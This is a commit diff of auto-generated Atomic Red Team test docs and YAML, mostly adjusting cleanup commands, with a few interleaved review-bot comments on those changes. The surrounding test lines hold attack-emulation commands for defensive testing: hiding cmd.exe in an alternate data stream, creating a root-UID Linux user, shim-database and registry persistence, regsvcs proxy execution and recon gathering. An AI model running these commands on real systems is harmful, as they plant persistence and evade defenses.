Generate docs from job=validate_atomics_generate_docs branch=master

This commit is contained in:
CircleCI Atomic Red Team doc generator
2020-02-28 18:03:51 +00:00
parent ce43569dcf
commit 5e8e3e0851
8 changed files with 62 additions and 71 deletions
+5 -2
@@ -62,17 +62,20 @@ Storing files in Alternate Data Stream (ADS) similar to Astaroth malware.
|------|-------------|------|---------------|
| payload_path | Path of file to hide in ADS | path | c:\windows\system32\cmd.exe|
| ads_file_path | Path of file to create an ADS under | path | C:\Users\Public\Libraries\yanki\desktop.ini|
| ads_name | Name of ADS | string | ADSName|
| ads_name | Name of ADS | string | desktop.ini|
#### Attack Commands: Run with `powershell`!
```
if (!(Test-Path C:\Users\Public\Libraries\yanki -PathType Container)) {
New-Item -ItemType Directory -Force -Path C:\Users\Public\Libraries\yanki
}
Start-Process -FilePath "$env:comspec" -ArgumentList "/c,type,#{payload_path},>,`"#{ads_file_path}:#{ads_name}`""
```
#### Cleanup Commands:
```
Remove-Item -Path "#{ads_file_path}" -Stream "#{ads_name}"
Remove-Item "#{ads_file_path}" -Force -ErrorAction Ignore
```
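Review bot: The new cleanup on the last line removes the entire host file, whereas the line it replaces removed only the named stream; if an operator points ads_file_path at a file that already existed, cleanup now destroys that file, and the directory the command creates at the top of the block (`C:\Users\Public\Libraries\yanki`) is never removed at all. I would keep the stream-scoped removal and instead delete the directory the test itself created: `Remove-Item -Path "#{ads_file_path}" -Stream "#{ads_name}" -ErrorAction Ignore` followed by `Remove-Item C:\Users\Public\Libraries\yanki -Recurse -Force -ErrorAction Ignore`. This page is generated, so the change belongs in the atomic's YAML rather than in the rendered markdown.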
+1 -1
@@ -58,7 +58,7 @@ $T1102 = $wc.DownloadString("https://www.aol.com/")
#### Cleanup Commands:
```
Clear-Variable T1102
Clear-Variable T1102 >$null 2>&1
```
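Review bot: The new cleanup line silences Clear-Variable with stream redirection, while every other PowerShell cleanup in this commit uses `-ErrorAction Ignore`; for consistency and to keep the intent (ignore a missing variable) explicit, I would write `Clear-Variable T1102 -ErrorAction Ignore`. Both forms work in PowerShell, so this is a style point only. As the docs are generated, the change should be made in the atomic's YAML.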
+3 -3
@@ -196,7 +196,7 @@ Set-ItemProperty -Force -Path #{registry_key_storage} -Name #{registry_entry_sto
#### Cleanup Commands:
```
Remove-ItemProperty -Force -Path -Path #{registry_key_storage} -Name #{registry_entry_storage}
Remove-ItemProperty -Force -Path #{registry_key_storage} -Name #{registry_entry_storage} -ErrorAction Ignore
```
@@ -227,7 +227,7 @@ new-itemproperty $key$name -Name * -Value 2 -Type DWORD;
#### Cleanup Commands:
```
$key = "HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains\bad-domain.com\"
Remove-item $key -Recurse
Remove-item $key -Recurse -ErrorAction Ignore
```
@@ -251,7 +251,7 @@ New-ItemProperty "HKCU:\Software\Microsoft\Windows\CurrentVersion\Internet Setti
#### Cleanup Commands:
```
Remove-ItemProperty "HKCU:\Software\Microsoft\Windows\CurrentVersion\Internet Settings" -Name T1112
Remove-ItemProperty "HKCU:\Software\Microsoft\Windows\CurrentVersion\Internet Settings" -Name T1112 -ErrorAction Ignore
```
+7 -7
@@ -74,9 +74,9 @@ Get-Process > $env:TEMP\T1119_3.txt
#### Cleanup Commands:
```
Remove-Item $env:TEMP\T1119_1.txt
Remove-Item $env:TEMP\T1119_2.txt
Remove-Item $env:TEMP\T1119_3.txt
Remove-Item $env:TEMP\T1119_1.txt -ErrorAction Ignore
Remove-Item $env:TEMP\T1119_2.txt -ErrorAction Ignore
Remove-Item $env:TEMP\T1119_3.txt -ErrorAction Ignore
```
@@ -103,10 +103,10 @@ tree C:\AtomicRedTeam\atomics > %TEMP%\T1119_4.txt
#### Cleanup Commands:
```
del %TEMP%\T1119_1.txt
del %TEMP%\T1119_2.txt
del %TEMP%\T1119_3.txt
del %TEMP%\T1119_4.txt
del %TEMP%\T1119_1.txt >$null 2>&1
del %TEMP%\T1119_2.txt >$null 2>&1
del %TEMP%\T1119_3.txt >$null 2>&1
del %TEMP%\T1119_4.txt >$null 2>&1
```
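Review bot: The four `del ... >$null 2>&1` lines in the second cleanup block are cmd.exe syntax (`del` with `%TEMP%` expansion, matching the `tree ... > %TEMP%\T1119_4.txt` command in the hunk header), and cmd has no `$null` device: the redirection creates a literal file named `$null` in the working directory each time cleanup runs, leaving a new artifact behind while trying to be silent. Use the cmd null device instead: `del %TEMP%\T1119_1.txt >nul 2>&1`, and likewise for the other three lines. The PowerShell block above is fine, since `$null` is valid there. The executor declaration is not shown in this hunk, so confirm it is command_prompt; the docs are generated, so the fix belongs in the atomic's YAML.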
+2 -2
@@ -68,8 +68,8 @@ C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe #{file_name}
#### Cleanup Commands:
```
del #{file_name}
del key.snk
del #{file_name} >$null 2>&1
del key.snk >$null 2>&1
```
+1 -1
@@ -140,7 +140,7 @@ New-LocalUser -Name "#{username}" -NoPassword
#### Cleanup Commands:
```
Remove-LocalUser -Name "#{username}"
Remove-LocalUser -Name "#{username}" -ErrorAction Ignore
```
+4 -4
@@ -70,8 +70,8 @@ Copy-Item $PathToAtomicsFolder\T1138\bin\T1138CompatDatabase.sdb C:\Windows\appp
#### Cleanup Commands:
```
Remove-Item C:\Windows\apppatch\Custom\T1138CompatDatabase.sdb
Remove-Item C:\Windows\apppatch\Custom\Custom64\T1138CompatDatabase.sdb
Remove-Item C:\Windows\apppatch\Custom\T1138CompatDatabase.sdb -ErrorAction Ignore
Remove-Item C:\Windows\apppatch\Custom\Custom64\T1138CompatDatabase.sdb -ErrorAction Ignore
```
@@ -96,8 +96,8 @@ New-ItemProperty -Path HKLM:"\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCo
#### Cleanup Commands:
```
Remove-ItemProperty -Path HKLM:"\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Custom" -Name "AtomicRedTeamT1138"
Remove-ItemProperty -Path HKLM:"\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\InstalledSDB" -Name "AtomicRedTeamT1138"
Remove-ItemProperty -Path HKLM:"\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Custom" -Name "AtomicRedTeamT1138" -ErrorAction Ignore
Remove-ItemProperty -Path HKLM:"\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\InstalledSDB" -Name "AtomicRedTeamT1138" -ErrorAction Ignore
```
+39 -51
@@ -645,8 +645,8 @@ persistence:
Copy-Item $PathToAtomicsFolder\T1138\bin\T1138CompatDatabase.sdb C:\Windows\apppatch\Custom\T1138CompatDatabase.sdb
Copy-Item $PathToAtomicsFolder\T1138\bin\T1138CompatDatabase.sdb C:\Windows\apppatch\Custom\Custom64\T1138CompatDatabase.sdb
cleanup_command: |
Remove-Item C:\Windows\apppatch\Custom\T1138CompatDatabase.sdb
Remove-Item C:\Windows\apppatch\Custom\Custom64\T1138CompatDatabase.sdb
Remove-Item C:\Windows\apppatch\Custom\T1138CompatDatabase.sdb -ErrorAction Ignore
Remove-Item C:\Windows\apppatch\Custom\Custom64\T1138CompatDatabase.sdb -ErrorAction Ignore
- name: Registry key creation and/or modification events for SDB
description: 'https://www.fireeye.com/blog/threat-research/2017/05/fin7-shim-databases-persistence.html
@@ -660,8 +660,8 @@ persistence:
New-ItemProperty -Path HKLM:"\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Custom" -Name "AtomicRedTeamT1138" -Value "AtomicRedTeamT1138"
New-ItemProperty -Path HKLM:"\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\InstalledSDB" -Name "AtomicRedTeamT1138" -Value "AtomicRedTeamT1138"
cleanup_command: |
Remove-ItemProperty -Path HKLM:"\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Custom" -Name "AtomicRedTeamT1138"
Remove-ItemProperty -Path HKLM:"\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\InstalledSDB" -Name "AtomicRedTeamT1138"
Remove-ItemProperty -Path HKLM:"\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Custom" -Name "AtomicRedTeamT1138" -ErrorAction Ignore
Remove-ItemProperty -Path HKLM:"\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\InstalledSDB" -Name "AtomicRedTeamT1138" -ErrorAction Ignore
T1197:
technique:
x_mitre_data_sources:
@@ -1202,7 +1202,7 @@ persistence:
command: 'New-LocalUser -Name "#{username}" -NoPassword
'
cleanup_command: 'Remove-LocalUser -Name "#{username}"
cleanup_command: 'Remove-LocalUser -Name "#{username}" -ErrorAction Ignore
'
- name: Create a new user in Linux with `root` UID and GID.
@@ -1227,9 +1227,7 @@ persistence:
command: |
useradd -o -u 0 -g 0 -M -d /root -s /bin/bash #{username}
echo "#{password}" | passwd --stdin #{username}
cleanup_command: 'userdel #{username}
'
cleanup_command: 'userdel #{username}'
T1038:
technique:
x_mitre_permissions_required:
@@ -9597,8 +9595,8 @@ defense-evasion:
$EncodedCommand =[Convert]::ToBase64String($Bytes)
$EncodedCommand
Set-ItemProperty -Force -Path #{registry_key_storage} -Name #{registry_entry_storage} -Value $EncodedCommand
cleanup_command: 'Remove-ItemProperty -Force -Path -Path #{registry_key_storage}
-Name #{registry_entry_storage}
cleanup_command: 'Remove-ItemProperty -Force -Path #{registry_key_storage}
-Name #{registry_entry_storage} -ErrorAction Ignore
'
- name: Add domain to Trusted sites Zone
@@ -9619,7 +9617,7 @@ defense-evasion:
new-itemproperty $key$name -Name * -Value 2 -Type DWORD;
cleanup_command: |
$key = "HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains\bad-domain.com\"
Remove-item $key -Recurse
Remove-item $key -Recurse -ErrorAction Ignore
- name: Javascript in registry
description: 'placing javascript in registry for persistence
@@ -9633,10 +9631,8 @@ defense-evasion:
Settings" -Name T1112 -Value "<script>"
'
cleanup_command: 'Remove-ItemProperty "HKCU:\Software\Microsoft\Windows\CurrentVersion\Internet
Settings" -Name T1112
'
cleanup_command: Remove-ItemProperty "HKCU:\Software\Microsoft\Windows\CurrentVersion\Internet
Settings" -Name T1112 -ErrorAction Ignore
T1170:
technique:
x_mitre_data_sources:
@@ -9920,21 +9916,17 @@ defense-evasion:
ads_name:
description: Name of ADS
type: string
default: ADSName
default: desktop.ini
executor:
name: powershell
elevation_required: false
prereq_command: |
if (!(Test-Path "#{ads_file_path}"))
{
$FileCreated = New-Item -Path "#{ads_file_path}" -Type "file" -Force
0
}
else {0}
command: 'Start-Process -FilePath "$env:comspec" -ArgumentList "/c,type,#{payload_path},>,`"#{ads_file_path}:#{ads_name}`""
'
cleanup_command: Remove-Item -Path "#{ads_file_path}" -Stream "#{ads_name}"
prereq_command: ''
command: |
if (!(Test-Path C:\Users\Public\Libraries\yanki -PathType Container)) {
New-Item -ItemType Directory -Force -Path C:\Users\Public\Libraries\yanki
}
Start-Process -FilePath "$env:comspec" -ArgumentList "/c,type,#{payload_path},>,`"#{ads_file_path}:#{ads_name}`""
cleanup_command: Remove-Item "#{ads_file_path}" -Force -ErrorAction Ignore
T1126:
technique:
x_mitre_data_sources:
@@ -10864,9 +10856,9 @@ defense-evasion:
Set-Content key.snk -Value $Content -Encoding Byte
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /r:System.EnterpriseServices.dll /target:library /keyfile:key.snk #{source_file}
C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe #{file_name}
cleanup_command: |
del #{file_name}
del key.snk
cleanup_command: |-
del #{file_name} >$null 2>&1
del key.snk >$null 2>&1
T1117:
technique:
x_mitre_data_sources:
@@ -12249,9 +12241,7 @@ defense-evasion:
$T1102 = (New-Object System.Net.WebClient).DownloadData("https://www.reddit.com/")
$wc = New-Object System.Net.WebClient
$T1102 = $wc.DownloadString("https://www.aol.com/")
cleanup_command: 'Clear-Variable T1102
'
cleanup_command: Clear-Variable T1102 >$null 2>&1
T1220:
technique:
x_mitre_data_sources:
@@ -13014,8 +13004,8 @@ privilege-escalation:
Copy-Item $PathToAtomicsFolder\T1138\bin\T1138CompatDatabase.sdb C:\Windows\apppatch\Custom\T1138CompatDatabase.sdb
Copy-Item $PathToAtomicsFolder\T1138\bin\T1138CompatDatabase.sdb C:\Windows\apppatch\Custom\Custom64\T1138CompatDatabase.sdb
cleanup_command: |
Remove-Item C:\Windows\apppatch\Custom\T1138CompatDatabase.sdb
Remove-Item C:\Windows\apppatch\Custom\Custom64\T1138CompatDatabase.sdb
Remove-Item C:\Windows\apppatch\Custom\T1138CompatDatabase.sdb -ErrorAction Ignore
Remove-Item C:\Windows\apppatch\Custom\Custom64\T1138CompatDatabase.sdb -ErrorAction Ignore
- name: Registry key creation and/or modification events for SDB
description: 'https://www.fireeye.com/blog/threat-research/2017/05/fin7-shim-databases-persistence.html
@@ -13029,8 +13019,8 @@ privilege-escalation:
New-ItemProperty -Path HKLM:"\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Custom" -Name "AtomicRedTeamT1138" -Value "AtomicRedTeamT1138"
New-ItemProperty -Path HKLM:"\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\InstalledSDB" -Name "AtomicRedTeamT1138" -Value "AtomicRedTeamT1138"
cleanup_command: |
Remove-ItemProperty -Path HKLM:"\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Custom" -Name "AtomicRedTeamT1138"
Remove-ItemProperty -Path HKLM:"\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\InstalledSDB" -Name "AtomicRedTeamT1138"
Remove-ItemProperty -Path HKLM:"\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Custom" -Name "AtomicRedTeamT1138" -ErrorAction Ignore
Remove-ItemProperty -Path HKLM:"\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\InstalledSDB" -Name "AtomicRedTeamT1138" -ErrorAction Ignore
T1088:
technique:
x_mitre_data_sources:
@@ -22307,9 +22297,9 @@ execution:
Set-Content key.snk -Value $Content -Encoding Byte
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /r:System.EnterpriseServices.dll /target:library /keyfile:key.snk #{source_file}
C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe #{file_name}
cleanup_command: |
del #{file_name}
del key.snk
cleanup_command: |-
del #{file_name} >$null 2>&1
del key.snk >$null 2>&1
T1117:
technique:
x_mitre_data_sources:
@@ -25747,9 +25737,9 @@ collection:
Get-ChildItem Env: > $env:TEMP\T1119_2.txt
Get-Process > $env:TEMP\T1119_3.txt
cleanup_command: |
Remove-Item $env:TEMP\T1119_1.txt
Remove-Item $env:TEMP\T1119_2.txt
Remove-Item $env:TEMP\T1119_3.txt
Remove-Item $env:TEMP\T1119_1.txt -ErrorAction Ignore
Remove-Item $env:TEMP\T1119_2.txt -ErrorAction Ignore
Remove-Item $env:TEMP\T1119_3.txt -ErrorAction Ignore
- name: Recon information for export with Command Prompt
description: 'collect information for exfiltration
@@ -25764,11 +25754,11 @@ collection:
doskey /history > %TEMP%\T1119_2.txt
wmic process list > %TEMP%\T1119_3.txt
tree C:\AtomicRedTeam\atomics > %TEMP%\T1119_4.txt
cleanup_command: |
del %TEMP%\T1119_1.txt
del %TEMP%\T1119_2.txt
del %TEMP%\T1119_3.txt
del %TEMP%\T1119_4.txt
cleanup_command: |-
del %TEMP%\T1119_1.txt >$null 2>&1
del %TEMP%\T1119_2.txt >$null 2>&1
del %TEMP%\T1119_3.txt >$null 2>&1
del %TEMP%\T1119_4.txt >$null 2>&1
T1115:
technique:
x_mitre_data_sources:
@@ -28245,9 +28235,7 @@ command-and-control:
$T1102 = (New-Object System.Net.WebClient).DownloadData("https://www.reddit.com/")
$wc = New-Object System.Net.WebClient
$T1102 = $wc.DownloadString("https://www.aol.com/")
cleanup_command: 'Clear-Variable T1102
'
cleanup_command: Clear-Variable T1102 >$null 2>&1
initial-access:
'':
technique: